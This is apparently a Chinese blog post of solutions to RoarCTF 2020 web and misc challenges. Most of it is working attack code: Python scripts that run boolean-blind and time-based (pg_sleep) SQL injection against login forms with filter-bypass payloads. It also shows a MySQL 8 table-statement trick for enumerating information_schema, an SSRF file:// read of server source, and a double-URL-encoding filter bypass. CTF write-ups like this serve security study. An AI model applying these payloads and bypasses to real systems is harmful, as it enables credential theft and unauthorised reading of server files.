ccc 太菜了!!!

web

ezsql

fuzz一下过滤了

1
空格 select union ; if

写脚本bool盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests

url = 'http://139.129.98.9:30003/login.php'
flag=''
proxies={
    "http":"127.0.0.1:8080"
}
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        # case/**/when/**/ord(substr((password)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end
        # 1'||(0)='1   (case/**/when/**/(ord(substr((password)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)
        data1 = {"username": "1'||(case/**/when/**/(ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))/**/in/**/({}))/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
        data2 = {"username": "1'||(case/**/when/**/ord(substr((table/**/`f11114g`/**/limit/**/1,1)/**/from/**/{}/**/for/**/1))>{}/**/then/**/1/**/else/**/0/**/end)='1".format(str(i),str(mid)), "password": "123"}
        try:
            print(i,mid)
            r1=requests.post(url, data=data1,proxies=proxies)
            if 'password error!' in r1.text:
                flag+=chr(mid)
                print(flag)
                break
            r2=requests.post(url, data=data2,proxies=proxies)
            if 'password error!' in r2.text:
                low=mid+1
            else:
                top=mid-1
        except Exception as e:
            print(e)
    if flag==f1:
        break
print(flag)

# 8.0.22-0ubuntu0.20.04.2
# ctf
# gml666   b4bc4c343ed120df3bff56d586e6d617

注出密码登陆发现没flag ccc mysql版本为8 想到了之前在p神星球看到的trick

写exp 这个脚本最后一位要改下 位置加1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

url = 'http://139.129.98.9:30003/login.php'
flag=''
proxies={
    "http":"127.0.0.1:8080"
}
index=0
s='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
for i in range(1,50):
    f1=flag
    for j in s:
        data = {"username": "1'||(case/**/when(('def','ctf','{}',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null)<(table/**/`information_schema`.`tables`/**/order/**/by/**/15/**/desc/**/limit/**/{},1))/**/then/**/1/**/else/**/0/**/end)='1".format(flag+j,str(index)), "password": "123"}
        try:
            print(i,j)
            r1=requests.post(url, data=data,proxies=proxies)
            if 'password error!' not in r1.text:
                flag+=s[s.index(j)-1]
                print(flag)
                break
        except Exception as e:
            print(e)
    if flag==f1:
        break
print(flag)
# `information_schema`.`tables`有21列 第15列为CREATE_TIME字段即创建时间根据这个排序就能把题目创建的表排在前面

你能登陆成功吗

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import string
burp0_url = "http://139.129.98.9:30005/"
burp0_cookies = {"sidebarStatus": "1"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://139.129.98.9:30005", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4343.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://139.129.98.9:30005/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

dic = string.ascii_letters + string.digits
flag = ''
for index in range(50):
    print(index)
    for i in dic:
        burp0_json={"password": "a'||case/**/when/**/password=overlay(password/**/placing/**/'{}'/**/from/**/{})/**/then/**/pg_sleep(3)/**/else/**/pg_sleep(0)/**/end--".format(i, index), "username": "admin"}
        try:
            requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json, timeout=2)
        except Exception as e:
            flag += i
            print(flag)
            break

misc

签到

查看源码发现:/?url=

image-20201205231950119

读源码:

1
?url=file:///var/www/html/index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
echo "<!-- /?url= -->";
if ($_GET['url']) {
  if (preg_match("/flag/i", $_GET['url'])) {
    die();
  }
  $curl = curl_init();

  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_TIMEOUT, 500);
  curl_setopt($curl, CURLOPT_URL, $_GET['url']);

  $res = curl_exec($curl);
  curl_close($curl);
  echo $res;
}

二次url编码绕过

1
?url=file:///fla%25%36%37

本文永久链接是:http://www.moonback.xyz/2020/12/05/RoarCTF2020%E9%83%A8%E5%88%86writeup/

评论